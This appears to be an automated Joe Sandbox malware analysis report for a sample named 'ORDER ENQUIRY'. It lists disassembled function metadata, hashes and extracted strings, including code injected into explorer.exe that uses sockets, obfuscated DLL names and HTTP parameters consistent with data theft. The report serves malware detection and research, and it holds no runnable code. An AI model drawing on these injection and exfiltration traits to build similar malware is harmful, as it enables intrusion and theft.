___swprintf_l.LIBCMT ref: 01AF293C
___swprintf_l.LIBCMT ref: 01AF295E
___swprintf_l.LIBCMT ref: 01AF29A3
___swprintf_l.LIBCMT ref: 01B2A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01B2A54E
ffff:, xrefs: 01B2A504
::%hs%u.%u.%u.%u, xrefs: 01B2A527
:%u.%u.%u.%u, xrefs: 01B2A5B8

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
Instruction ID: 831c91cb8b726f709f8a9bbbe02347a6cebabce3a4642ab2f43219ac7c85ee98
Opcode Fuzzy Hash: e07fc9a811566a6e58a2f69728ce2791a9dd5d4d103ee38c453f81e1b238d67b
Instruction Fuzzy Hash: 3C51B6B5A00156BFDB15DBEC8890A7FFBB8BB08240B54826EF569D7641D334DE4487E0

Function 01B62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B624A6
___swprintf_l.LIBCMT ref: 01B624E2
___swprintf_l.LIBCMT ref: 01B6257D
___swprintf_l.LIBCMT ref: 01B625A3
___swprintf_l.LIBCMT ref: 01B625C8
___swprintf_l.LIBCMT ref: 01B62608

Strings

ffff:, xrefs: 01B6247D, 01B6249D
::ffff:0:%u.%u.%u.%u, xrefs: 01B624DA
::%hs%u.%u.%u.%u, xrefs: 01B6249E
:%u.%u.%u.%u, xrefs: 01B625FF

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
Instruction ID: b9d4ef648b656e219604a9d1ee896c5f8f8c665482c46c0587f6518a53dc7beb
Opcode Fuzzy Hash: ba5834905847b45f841531f3b4c568d0e62d1ab6112b8a0dfb8a237a2e7d38dc
Instruction Fuzzy Hash: 4D51F575A00646AEEF39DE5CC89097EBBFCEF54200B4484EAE5D6C7681E778DA408760

Function 01AE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 01B246A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 01B24787
Execute=1, xrefs: 01B24713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B24725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B24742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B246FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B24655

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
Instruction ID: 6fac249583febfa7464bcd1102710df9592e355e9c3f0221059b9db127670a21
Opcode Fuzzy Hash: c81777d40abaf58ae61cdd273aa50baf65e480a6b18a600f95af52ed8826fbdc
Instruction Fuzzy Hash: 95512B3160021ABAEF25ABE8DC99FBE77F8EF14314F0400D9E605AB191D7709A458F91

Function 01B86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 58adcf44bbb8df271d0aac8b8795565953e6a340f0454bf5623df691cefa6873
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 5F022971508342AFD709DF18C590E6BBBE5EFC8B04F148A6DFA8987254DB31E905CB52

Function 01AFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01AFB6BF

Strings

0, xrefs: 01AFB695
+, xrefs: 01AFB65A
0, xrefs: 01AFB66F
-, xrefs: 01AFB650

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 5e535ebcff1d741b9cd3143b13896f31b7315d5bfd3a2424cff256eecbaaf511
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 39817F70E062499EEF258FECC8517EEBBB2AF85360F1C415DFA51A7291C73498408BB1

Function 01B620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B6214F
___swprintf_l.LIBCMT ref: 01B62172

Strings

%%%u, xrefs: 01B62146
]:%u, xrefs: 01B62169
[, xrefs: 01B6212B

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
Instruction ID: 9fc288ecf60332809f5209b09c6701d09980324c0ff99f52bfbba8d777a86018
Opcode Fuzzy Hash: e082d4a0e3f9d4419f2759edc3a9150fcde8382b047d457a7acbdf7f5a8b28ee
Instruction Fuzzy Hash: 2B213676E00119ABEB15DF69D841AFE7BFCEF64654F44019AEA05D3240E734DA018791

Function 01ADF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B202BD
RTL: Re-Waiting, xrefs: 01B2031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B202E7

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
Instruction ID: 66832531882546d511c605f4379ba2bba6e76b9085007612cccaec6754d4ba57
Opcode Fuzzy Hash: ef1bf85b57f2f4e02b4d29c58aaaa0d225b32f351932718a1cd0c3c5de0a76a7
Instruction Fuzzy Hash: AFE19E30604B419FD729DF28C884B6BBBE0FB89314F140A5DF5A68B2E1D774D949CB42

Function 01AEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01B27BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B27B7F
RTL: Resource at %p, xrefs: 01B27B8E

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
Instruction ID: f8e1e2c88924013f57c77dadda48f5fd1bdb6e432652198ff20c1bd1e6af53dc
Opcode Fuzzy Hash: e113c7e07ab97d4011c3a607d19b29e7349a955a26d6f0ee23bccdfc35482aee
Instruction Fuzzy Hash: CB4103317007029FDB29DF29CC58B6AB7E5EF98710F100A5DFA5AD7290DB31E8058BA1

Function 01AEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B2728C

Strings

RTL: Re-Waiting, xrefs: 01B272C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B27294
RTL: Resource at %p, xrefs: 01B272A3

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
Instruction ID: 4b517cc34b4d0c157b0a8e9118c9d441ae567172410567587aa1eb17dc0033bd
Opcode Fuzzy Hash: 6e320724c53cbb3c83d82a8fc6c9b6262194c901de357e5740c2af16ace6e6ae
Instruction Fuzzy Hash: 19412031700217ABCB29DE29CC45B66B7E1FBA6710F100658F959EB280DB30E85687E5

Function 01B62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01B6238D
___swprintf_l.LIBCMT ref: 01B623B3

Strings

%%%u, xrefs: 01B62384
]:%u, xrefs: 01B623AA

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
Instruction ID: f1e3c38cd9d662e13e5094cc781fbde499de33343363a02214a47ad82dca3ef2
Opcode Fuzzy Hash: d3b25d66010c6bcd4ec38b171c34574ff6ab182561d2cb00abaa3b1204761af0
Instruction Fuzzy Hash: 2F318872A002199FDB25DE2DCC80BEE77FCFF54650F4405DAE949E3140EB349A448B60

Function 01AF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01AF7E8B

Strings

-, xrefs: 01AF7DDD
+, xrefs: 01AF7DE8

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: a806f2c4079d80ec5596c5415f0498a2988c6b138e645b6a1d3168d6d73165de
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A491A071E0021A9AEB24DFEDC880ABEBBB5AF44720F58461EFB55E72C0D7349941CB51

Function 01AB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01AB9175
$, xrefs: 01AB9191

Memory Dump Source

Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
Instruction ID: 617c126d1eddb679879334fdc38cea4ce390121ed3ae0ae086de1557373ee174
Opcode Fuzzy Hash: ea342207214798dd2c186a71e2190632107a91178ad59943f3aab0a5f1089aec
Instruction Fuzzy Hash: 07811CB1D002699BDB35CB54CD45BEEB7B8AF08754F1541DAEA19B7280D7305E84CFA0

Analysis Process: explorer.exePID: 1028, Parent PID: 4564COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	448
Total number of Limit Nodes:	16

Executed Functions

Function 10697F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1069812E
setsockopt.WS2_32 ref: 10698830
recv.WS2_32 ref: 10698859

Strings

Co, xrefs: 10698323
nnec, xrefs: 1069832A
tion, xrefs: 10698331
&un=, xrefs: 106984F1
: cl, xrefs: 10698338
&sql, xrefs: 10698471
&br=, xrefs: 10698509
ose, xrefs: 1069833F
GET , xrefs: 10698318
dat=, xrefs: 10698290

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: b5685fa864940fc72d4906c00463e93280c547d8bef0f7fc5351e1050b3c15a9
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: BC529E30618A498FC759EF68C484BEAB7E1FB54300F51462ED4AFCB542DE30B949CB95

Function 10697232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 10697449

Strings

`, xrefs: 1069741D

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: d251611792239ad4feb0a474914fec8604923cd4f8594a38b919425a7e86fdd6
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 32225870A18A099FCB89DF28C4996EEF7E1FB98301F41422EE45ED3650DB34E851DB85

Function 10698E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10698E67

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 594c5af4c45a31ec0e3e02bd2f51ee36ae31b04e9d13fc4168de3c84eb6fd988
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: E6017134668B884F9788EF6CD48512AB7E4FBDD315F000B3EE99AC7254EB74D5414742

Function 10698E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10698E67

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 5749486cc187556f908bf1816d2e1c2657bd2483d4e1400de643326f4a3c4993
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 8501A234628B884F8788EB2C94512A6B3E5FBCE314F000B3EE99AC3241DB25D5024782

Function 106928C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 106929A0

Strings

nt: , xrefs: 1069291E
User-Agent: , xrefs: 10692935, 10692948
on.d, xrefs: 10692902
urlmon.dll, xrefs: 10692959

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 05bd0eb4e1d517d0d116c8edcae6496317746ad39d6801b18ddb9b5a20b6fa76
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 0631F231614A0D8FCB44EFA8C8857EEB7E0FF58204F40022AE85ED7240DF789649C799

Function 106928BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 106929A0

Strings

nt: , xrefs: 1069291E
User-Agent: , xrefs: 10692935, 10692948
on.d, xrefs: 10692902
urlmon.dll, xrefs: 10692959

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: f90d696c900fcd7ee0283e325c5bd3cc7ca47d920bd3277ad375e991670a740b
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: C421E130A10A4D8FCB45EFA9C8957EEBBE0FF58204F40422AE45AD7240DF749605CB99

Function 1068EB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 1068ECCA

Strings

el32, xrefs: 1068EBA0
.dll, xrefs: 1068EBCD
kern, xrefs: 1068EB99

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 5f7d0c849c58a3a663874ea5a4ce9295b0feede0ad2802c5beca7cac102ba5cd
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 58414A74A18A088FDB84EFA8C8D9BED77E0FB58300F00417AD84EDB655DE349945CB95

Function 1068EB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 1068ECCA

Strings

el32, xrefs: 1068EBA0
.dll, xrefs: 1068EBCD
kern, xrefs: 1068EB99

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: fa086b3c129154561ebf3f7551211afc5637a61c3dbd488cc24bb00cf17228a5
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 0A413774A18A088FDB84EFA8C899BED77E0FB68300F00417AD84EDB255DE349945CB95

Function 1069472E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10694791

Strings

ect, xrefs: 10694761
conn, xrefs: 1069475A

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 9076d29e0b712e02416a69a84d467a1180026f317df3154e36393b0ee1a19c32
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: E6014C30618B188FCB84EF5CE088B55B7E0FB59314F1645AAE90DCB226CA74D8818BC2

Function 10694732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 10694791

Strings

ect, xrefs: 10694761
conn, xrefs: 1069475A

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 8efcdbe7f3c16705951ec1ab4a6de80fca4f5de660b878c068e42f3a949861b4
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 27012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1641AEE80DCB226CB74C9818BC2

Function 106946B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 10694713

Strings

send, xrefs: 106946DA

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 0b3d11645177ccba8be6825434119ec854e23c5ee0d9fa346e6aaa1d07d2b7d1
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: D6012570618A1C8FDBC8DF5CD049B1577E0FB58314F1645AED85DCB266CA70D881CB85

Function 106945B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 10694611

Strings

sock, xrefs: 106945D9

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 81323b46c89029417c4c1d82435af5fb3baea28e63657602a7175b9b3c6debd4
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 68014F70618A1C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B4C981CB86

Function 1068C2DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1068C32D

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 1666b13f8df599cc2b5e4042590d5415b10d920057864343629b7bc06fdc5a45
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 21316A74614B4DDFDB949F2980882D5B7A1FB59311F44827FC91DCA10ACB74A491CFE1

Function 1068C412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 1068C461

Memory Dump Source

Source File: 00000004.00000002.4564943648.00000000105B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 105B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_105b0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 6cba2b164e98a6525a70815e967cc7e6d8d58bfffc36adaa449c97a7b3788577
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: C0F0C234268A4D4FD788EB2CD84563AB3E0FBA9214F41463EA54DC3264DA39D5814716

Non-executed Functions

Function 10D2CD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

32.d, xrefs: 10D2CF0B
wini, xrefs: 10D2CF72
ll, xrefs: 10D2CF13
net., xrefs: 10D2CF44
M, xrefs: 10D2D082
kern, xrefs: 10D2CF5A
user, xrefs: 10D2CF03
el32, xrefs: 10D2CF27
.dll, xrefs: 10D2CF2F
dll, xrefs: 10D2CF4C
S, xrefs: 10D2D073

Memory Dump Source

Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false

Joe Sandbox IDA Plugin

